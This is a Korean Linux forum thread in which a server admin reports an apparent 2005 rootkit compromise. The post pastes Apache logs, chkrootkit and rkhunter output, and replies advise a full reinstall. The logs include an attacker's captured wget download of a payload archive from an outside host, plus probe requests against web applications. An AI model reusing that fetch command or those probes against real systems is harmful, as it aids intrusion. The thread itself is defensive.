해킹을 당한 것 같습니다. 도움이 필요합니다.
안녕하십니까? 눈팅만 하다가 이렇게 글 남기게 되는군요.
그동안 서버에 관심을 좀 안두고 있었더니만..
rootkit 에 감염된 것 같습니다.
rootkit 으로 생각되는것 몇가지 지웠고,
명령어 감염된 것은 원본으로 교체를 완료했습니다만,
아직도 chkrootkit 에선 반응이 오는군요..
10일에 당한 것으로 생각되는데요..
그때의 secure 등의 로그는 존재하지 않구요.
apache 의 로그는 존재합니다.
의심가는 부분을 올려드리겠습니다.
[Sat Sep 10 05:54:50 2005] [error] [client 218.232.109.223] File does not exist: /html//zboard/skin/zero_vote/error.php
[Sat Sep 10 05:54:50 2005] [error] [client 218.232.109.223] script not found or unable to stat: /usr/local/apache/cgi-bin/awstats.pl
[Sat Sep 10 05:54:50 2005] [error] [client 218.232.109.223] script not found or unable to stat: /usr/local/apache/cgi-bin/awstats
[Sat Sep 10 05:54:50 2005] [error] [client 218.232.109.223] File does not exist: /html//awstats/awstats.pl
[Sat Sep 10 05:57:10 2005] [error] [client 172.170.31.247] File does not exist: /html/bbs/skin/zero_vote/images/t.gif
[Sat Sep 10 05:57:13 2005] [error] [client 172.170.31.247] File does not exist: /html/bbs/skin/zero_vote/images/t.gif
--05:57:16-- http://vegefm.com/nike/bind.tgz
=> `bind.tgz'
Resolving vegefm.com... 완료.
Connecting to vegefm.com[68.142.234.45]:80... connected.
HTTP 요청을 보냅니다, 서버로부터의 응답을 기다림...200 OK
길이: 12,492 [application/octet-stream]0K .......... .. 100% 49.19 KB/s
05:57:17 (49.19 KB/s) - `bind.tgz'가 보존되었습니다 [12492/12492]
[Sat Sep 10 05:57:18 2005] [error] [client 172.170.31.247] File does not exist: /html/bbs/skin/zero_vote/images/t.gif
[Sat Sep 10 05:57:21 2005] [error] [client 172.170.31.247] File does not exist: /html/favicon.ico[Sat Sep 10 06:30:41 2005] [error] [client 65.54.188.82] File does not exist: /html/robots.txt
[Sat Sep 10 06:30:41 2005] [error] [client 65.54.188.82] Directory index forbidden by rule: /html/
[Sat Sep 10 08:16:48 2005] [error] [client 71.100.210.94] Directory index forbidden by rule: /html/
[Sat Sep 10 08:32:26 2005] [error] [client 65.54.188.82] Directory index forbidden by rule: /html/
[Sat Sep 10 08:40:54 2005] [notice] SIGHUP received. Attempting to restart[Sun Sep 11 07:25:26 2005] [error] [client 210.172.177.131] script not found or unable to stat: /usr/local/apache/cgi-bin/openwebmail
[Sun Sep 11 15:51:44 2005] [error] [client 210.222.242.9] File does not exist: /html/_vti_bin/_vti_aut/fp30reg.dll
[Sun Sep 11 15:51:44 2005] [error] [client 210.222.242.9] request failed: URI too long
[Mon Sep 12 08:29:50 2005] [error] [client 216.145.17.190] File does not exist: /html/unigen/robots.txt
[Mon Sep 12 16:57:04 2005] [error] [client 220.230.174.248] Directory index forbidden by rule: /html/
[Mon Sep 12 17:14:13 2005] [error] [client 210.222.205.133] Directory index forbidden by rule: /html/
[Mon Sep 12 17:31:20 2005] [error] [client 210.222.109.235] Directory index forbidden by rule: /html/
[Mon Sep 12 17:58:11 2005] [error] [client 211.213.83.129] Directory index forbidden by rule: /html/
[Tue Sep 13 01:12:27 2005] [error] [client 61.109.95.103] File does not exist: /html/images/t.gif
Error: Error while extracting EXIF fields: JPEG file does not contain EXIF data
감염되었던 파일은
init, ifconfig, find, pstree, netstat, ls, ps, login, syslogd
입니다.
아래는 chkrootkit 결과입니다.
Checking `aliens'... /etc/ld.so.hash
Searching for t0rn's v8 defaults... Possible t0rn v8 \(or variation\) rootkit installed
Searching for suspicious files and dirs, it may take a while...
/usr/lib/perl5/5.8.0/i386-linux-thread-multi/.packlist /lib/security/.config
/lib/security/.config
Searching for Showtee... Warning: Possible Showtee Rootkit installed
Searching for Romanian rootkit... /usr/include/file.h /usr/include/proc.h
Searching for ShKit rootkit default files and dirs... Possible ShKit rootkit installed
아래는 rkhunter결과입니다.
Rootkit 'Flea Linux Rootkit'... [ Warning! ]
Rootkit 'SHV4'... [ Warning! ]
Rootkit 'SunOS Rootkit'... [ Warning! ]
PHP Warning: Unable to load dynamic library './imap.so' - ./imap.so: cannot open shared object file: No such file or directory in Unknown on line 0
PHP Warning: Unable to load dynamic library './ldap.so' - ./ldap.so: cannot open shared object file: No such file or directory in Unknown on line 0
Checking for allowed protocols... [ Warning (SSH v1 allowed) ]File scan
Scanned files: 342
Possible infected files: 3
Possible rootkits: Flea Linux Rootkit SHV4 SunOS RootkitApplication scan
Vulnerable applications: 5Scanning took 177 seconds
아직 백도어나 이런부분이 남아있는 것 같습니다, rootkit 도 완전히 제거된것 같지 않구요...
이 상황에서 어떤 조치를 취해야 할까요?
서버를 밀어버리는 건 좀 부담이 되거든요.....
서버를 밀지 않는 상태에서의 조치법을 알려주세요..
감사합니다..
서버 밀지 않고... 방법 없습니다. <어떠한 역경에도 굴하
서버 밀지 않고... 방법 없습니다.
<어떠한 역경에도 굴하지 않는 '하양 지훈'>
#include <com.h> <C2H5OH.h> <woman.h>
do { if (com) hacking(); if (money) drinking(); if (women) loving(); } while (1);
그렇다면... 서버를 민 이후에 어떤 조치를 취해야 할까요?전 아직
그렇다면... 서버를 민 이후에 어떤 조치를 취해야 할까요?
전 아직 커널 업그레이드도 안 해봤거든요....
간략히 말씀해주시면....
이것저것 도전해보겠습니다..
0. 랜선 뽑기1. 일단 백업할 리스트 작성 하시고, 차례차례 백업을
0. 랜선 뽑기
1. 일단 백업할 리스트 작성 하시고, 차례차례 백업을 하시고요.
2. 다시 리눅스를 설치를 하세요.
3. 설치 후에 필요없는 서비스는 다 내리시고요.
4. 커널 최신걸로 업그레이드 하세요.
6. 사용하는 서비스는 최신 버젼으로 업그레이드
7. 랜선을 꼽아서 재미난 리눅싱을...
<어떠한 역경에도 굴하지 않는 '하양 지훈'>
#include <com.h> <C2H5OH.h> <woman.h>
do { if (com) hacking(); if (money) drinking(); if (women) loving(); } while (1);
채팅 수준의 빠른 답변 정말 감사합니다...우선은 미는건 최후의 보루
채팅 수준의 빠른 답변 정말 감사합니다...
우선은 미는건 최후의 보루로 두고요.. ㅠ_ㅠ;
백업은 왠만큼은 받아둔 상태입니다.
명령어 를 모두 복구한만큼 , 명령어를 이용한
오픈포트 라던지, process 등의 분석을 통하여 어느정도
백도어를 가늠할 수 있진 않을까요??
고수님들이 사용하시는 방법이 있을 것이라 생각됩니다.
부탁드립니다...
밀어야됩니다.커널 레벨에서 백도어 열었으면 방법없어요.
밀어야됩니다.
커널 레벨에서 백도어 열었으면 방법없어요.
댓글 달기